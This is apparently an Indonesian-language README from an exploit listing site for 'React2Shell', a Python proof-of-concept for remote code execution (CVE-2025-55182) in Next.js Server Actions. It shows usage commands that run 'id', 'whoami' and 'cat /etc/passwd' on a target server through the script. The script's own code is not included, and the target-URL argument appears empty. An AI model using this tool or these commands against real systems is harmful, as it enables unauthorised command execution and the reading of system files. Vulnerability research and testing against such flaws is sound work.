## https://sploitus.com/exploit?id=02C28234-D3B6-5D57-823A-350E54212819
# React2Shell PoC (CVE-2025-55182)
Skrip Proof of Concept (PoC) non-destruktif berbasis Python untuk pengujian kerentanan _Remote Code Execution_ (RCE) pada Next.js Server Actions.
## Cara Penggunaan
- Melihat identitas user (`id`):
```bash
python3 react2shell.py -u -c 'id'
```
- Melihat identitas user (`whoami`):
```bash
python3 react2shell.py -u -c 'whoami'
```
- Membaca file sistem (`cat`):
```bash
python3 react2shell.py -u -c 'cat /etc/passwd'
```